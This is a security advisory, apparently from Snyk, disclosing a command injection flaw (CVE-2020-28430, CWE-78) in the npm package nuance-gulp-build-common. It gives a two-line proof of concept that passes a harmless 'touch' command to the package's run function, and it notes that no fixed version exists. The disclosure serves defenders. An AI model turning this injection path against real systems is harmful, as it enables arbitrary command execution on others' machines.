Command Injection
Affecting nuance-gulp-build-common package, ALL versions
Report new vulnerabilities
Do your applications use this vulnerable package?
Test your applications
Overview
Affected versions of this package are vulnerable to Command Injection via the index.js
file.
PoC:
/var a = require("nuance-gulp-build-common")
a.run("touch JHU")
Remediation
There is no fixed version for nuance-gulp-build-common
.
CVSS Score
9.8
high severity
-
Attack VectorNetwork
-
Attack ComplexityLow
-
Privileges RequiredNone
-
User InteractionNone
-
ScopeUnchanged
-
ConfidentialityHigh
-
IntegrityHigh
-
AvailabilityHigh
- Credit
- JHU System Security Lab
- CVE
- CVE-2020-28430
- CWE
- CWE-78
- Snyk ID
- SNYK-JS-NUANCEGULPBUILDCOMMON-1050419
- Disclosed
- 11 Dec, 2020
- Published
- 23 Feb, 2021